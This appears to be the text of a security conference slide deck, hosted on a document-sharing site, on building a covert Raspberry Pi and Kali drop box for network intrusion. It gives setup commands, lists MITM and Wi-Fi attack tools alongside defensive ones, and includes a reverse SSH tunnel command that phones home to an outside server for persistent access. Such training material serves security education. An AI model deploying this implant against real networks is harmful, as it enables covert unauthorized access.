Stealth Attack from the Produce Aisle



Similar documents
Adafruit's Raspberry Pi Lesson 6. Using SSH

Chapter 1 Hardware and Software Introductions of pcduino

MITM Man in the Middle

CONNECTING THE RASPBERRY PI TO A NETWORK

Raspberry Pi Android Projects. Raspberry Pi Android Projects. Gökhan Kurt. Create exciting projects by connecting Raspberry Pi to your Android phone

Getting Started Guide

Connections and wiring Diagram

Adafruit's Raspberry Pi Lesson 1. Preparing an SD Card for your Raspberry Pi

WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

RASPBERRY PI BAT PROJEKT News and Add ons WLAN connection and UMTS (SMS transmission)

Raspberry Pi Setup Tutorial

AlienVault. Unified Security Management x Offline Update and Software Restoration Procedures

CDH installation & Application Test Report

Operating System Installation Guide

Setting up a Raspberry Pi as a WiFi access point

BeagleBone Black: Installing Operating Systems

Installing Your Printer to the Network for the First Time

Create a virtual machine at your assigned virtual server. Use the following specs

Using pcduino's WiFi Dongle With the Pi a

Using Symantec NetBackup with Symantec Security Information Manager 4.5

Movie Cube. User s Guide to Wireless Function

Interlink Networks Secure.XS and Cisco Wireless Deployment Guide

Preparing for the Installation

Penetration Testing LAB Setup Guide

Topics in Network Security

CYBERTRON NETWORK SOLUTIONS

Building a Robot Kit with a Raspberry PI 2 and Windows 10 IoT Core

CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities

How to Install Applications (APK Files) on Your Android Phone

Troubleshooting Sprint Mobile Broadband USB Modem by Novatel Wireless TM (Ovation TM U727)

ClearOS Network, Gateway, Server Quick Start Guide

Checkmate 5.3.1: Hosted Solution Setup August 7, 2009

USB 2.0 Flash Drive User Manual

Setting up VNC, SAMBA and SSH on Ubuntu Linux PCs Getting More Benefit out of Your Local Area Network

Lab Organizing CCENT Objectives by OSI Layer

Partek Flow Installation Guide

Setup Wireless LAN (WLAN) on the Raspberry Pi

Snow Inventory. Installing and Evaluating

TE100-P21/TEW-P21G Windows 7 Installation Instruction

Active Directory - User, group, and computer account management in active directory on a domain controller. - User and group access and permissions.

WEP WPA WPS :: INDEX : Introduction :

RMAR Technologies Pvt. Ltd.

How to configure your Thomson SpeedTouch 780WL for ADSL2+

Raspberry Pi Webserver

Quick Installation Guide

Adafruit's Raspberry Pi Lesson 3. Network Setup

Linux Network Security

Installing a Symantec Backup Exec Agent on a SnapScale Cluster X2 Node or SnapServer DX1 or DX2. Summary

Pen Test Tips 2. Shell vs. Terminal

PC-Duo Web Console Installation Guide

AdRadionet to IBM Bluemix Connectivity Quickstart User Guide

NetPoint Configuration Guide. for thin clients

Diamante WiFi Wireless Communication User Guide. CradlePoint CTR35

PFSENSE Load Balance with Fail Over From Version Beta3

Installing the Operating System or Hypervisor

Link Layer and Network Layer Security for Wireless Networks

Software Installation Guide

WiFi Security Assessments

What is Bitdefender BOX?

Uploading files to FTP server

The LimitlessLED Wifi Bridge 4.0 is compatible with RGBW(new), RGB(old), and Dual White(current) LimitlessLED lightbulbs.

CT LANforge WiFIRE Chromebook a/b/g/n WiFi Traffic Generator with 128 Virtual STA Interfaces

Domain 5.0: Network Tools

Networking. General networking. Networking overview. Common home network configurations. Wired network example. Wireless network examples

How To Connect A Raspberry Pi To The Internet On A Microsoft Moonstone 2 (Microsoft) Microsoft Powerbook 2 (Powerbook 2) (Powerboard 2) And Powerbook 3 (Powerstation 2)

Penetration Testing LAB Setup Guide

Lab Configure Basic AP Security through IOS CLI

Microsoft Virtual Labs. Administering the IIS 7 File Transfer Protocol (FTP) Server

Ways to Use USB in Embedded Systems

The FlexiSchools Online Order Management (FOOM) Installation Guide

Diamante WiFi Wireless Communication User Guide. Linksys E1200

Create bridges, add ports, show bridge and port statistics, status, as well as the OVS database

Reference and Troubleshooting: FTP, IIS, and Firewall Information

Wifi Web Server Module w TF Socket User s Guide

WUA-1610, WUA-1610H. 300Mbps Wireless USB Adapter. User Manual V1.0

Intel vpro. Technology-based PCs SETUP & CONFIGURATION GUIDE FOR

Quick Start Guide. User Manual. 1 March 2012

c. Securely insert the Ethernet cable from your cable or DSL modem into the Internet port (B) on the WGT634U. Broadband modem

DoorKing IM Server TM

vrealize Air Compliance OVA Installation and Deployment Guide

Step by step guide for connecting PC to wired LAN at dormitories of University of Pardubice

How To Set Up Isu-Oit-Wpa On Windows 7 For Wireless Access (Isu- Oit- Wpa) On A Pc Or Mac Or Ipa (Windows 7) On An Ipa Or Ipac (Windows

SIP-DECT Knowledge Base SIP-DECT System Update

UBIQUITI BRIDGE CONFIGURATION PROCEDURE (PowerStation & NanoStation Units ONLY)

Remote Unix Lab Environment (RULE)

Reboot the ExtraHop System and Test Hardware with the Rescue USB Flash Drive

Wireless Network Risks and Controls

FinIntrusion Kit / Release Notes FINUSB SUITE SPECIFICATIONS. FINFISHER: FinIntrusion Kit 2.2 Release Notes

USB Functions for Windows 7

LOCKSS on LINUX. Installation Manual and the OpenBSD Transition 02/17/2011

Network Server for Windows. Overview of the Sequencher Network Page 2. Installing Sequencher Server for the First Time Page 3

MN-700 Base Station Configuration Guide

Author A.Kishore/Sachin VNC Background

Transferring AIS to a different computer

Installing Windows 95 Drivers and Utilities for the Cisco Aironet 340/350 Series Client Adapters

Guide for Updating Firmware and Troubleshooting Connection Issues

Transcription:

Stealth Attack from the Produce Aisle Keith Benedict & Todd Dow 1

Introductions Keith Benedict Innovation & Security Specialist 30+ years IT experience MC* designations @mehtryx Todd Dow Team Lead, IT Security 15+ years IT experience CISA, PMP @toddhdow 2

What are we going to talk about? What options are available? How to build a working device? Hardware add-ons Commonly available software tools Attack and defence scenarios 3

First: What are the scenarios? Think about this, where exactly can you see these devices being used? Silent, portable, 4x2x1 footprint, inexpensive and remotely accessible 4

Scenarios Targeted PC, either directly connected or MITM 5

Scenarios Device plugged into LAN 6

Scenarios Operating without wires, Evil AP or more 7

Scenarios Many more options exist 8

How to build a working device Step 1 - determine the hardware you will use 9

Raspberry Pi + Kali 10

What's in the box? CanaKit Raspberry Pi 2 complete starter kit, with: Raspberry Pi 2 Wifi 8 GB SD card Case Power supply HDMI cable SanDisk 32 GB Ultra Class 10 Micro SDHC card Alfa AWUS036NH 2000mW 2W 802.11 g/n High Gain USB Wireless G/N Long- RangeWiFi Network Adapter w/ 5dBi Screw-On swivel rubber antenna and pane. 11

Assembling your Pi 12

Installing Kali on microsd 1. Download kali linux 2. Verify the download 3. Insert microsd card and determine device path 4. unmount the disk 5. use dd to image the kali file https://www.offensive-security.com/ > shasum kali<insert full filename here> > diskutil list > diskutil unmount /dev/disk1 > dd if=kali-2.0.1-rpi2.img of=/dev/disk1 bs=1m (control+t to see progress of image creation) 13

How to build it - part 2 1. Eject the microsd card 2. Insert disk into Raspberry Pi 2, plug in peripherals and power it up. Voila! 3. Connect via ssh: ssh root@192.168.1.100 (substitute your machine's IP address here) You should now have a command line connection to Kali on your Raspberry Pi 2. 14

Kali - first things... Change SSH host keys: > rm /etc/ssh/ssh_host_* > dpkg-reconfigure openssh-server > service ssh restart Time setup: > dpkg-reconfigure tzdata Set up VNC Access: > apt-get update > apt-get dist-upgrade -y > apt-get install x11vnc -y > startx & > x11vnc & (in a separate terminal window) Set up Remote Access > apt-get install xrdp -y > chkconfig --levels 35 xrdp on > service xrdp start > service xrdp stop (when finished) Regular maintenance: > apt-get upgrade > apt-get update > apt-get dist-upgrade > cat /etc/issue > uname -a 15

Monitor Mode? Hardware Addons Chipsets matter in order to support putting a device into monitor mode. > iwconfig > ifconfig wlan0 up Problems? hardware not detected wpa support rfkill 16

Commonly Available Software Tools Tools include: Aircrack or EvilAP Airbase Arp spoofing hping DoS mitmproxy Snort arpwatch ossec log analysis network monitoring 17

Scenarios Revisited How to make a reverse ssh proxy Requirements: Public accessible ssh server (Static IP) Raspberry Pi configured to accept ssh connections Certificate setup sor ssh authentication Making the Connection from the Pi: > ssh -N -R 2222:localhost:22 serveruser@25.25.25.25 From server you can now do: > ssh -l piuser -p 2222 localhost Persistence is just a small shell script away. Problems? 18

Late breaking news Advanced Wi-Fi Attacks Using Commodity Hardware Mathy Vanhoef: vanhoefm/modwifi "Low layer attacks such as reactive and constant jamming using commodity devices" such as AWUS036NHA (sound familiar?) Attacks include: Jamming Selective jamming Channel-based MITM Attack TKIP when used as a group cipher 19

Q&A - Third Party Links/Ref Power Brick by Richee @ TunnelUp http://www.tunnelsup.com/raspberry-pi-phoning-home-using-a-reverse-remote-ssh-tunnel The Hacks of Mr. Robot: How to Build a Hacking Raspberry Pi http://null-byte.wonderhowto.com/how-to/hacks-mr-robot-build-hacking-raspberry-pi-0163143/ Working with a Raspberry Pi for network attacks http://jesselauwers.github.io/raspberry-pi-kali-mitm/ 20

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information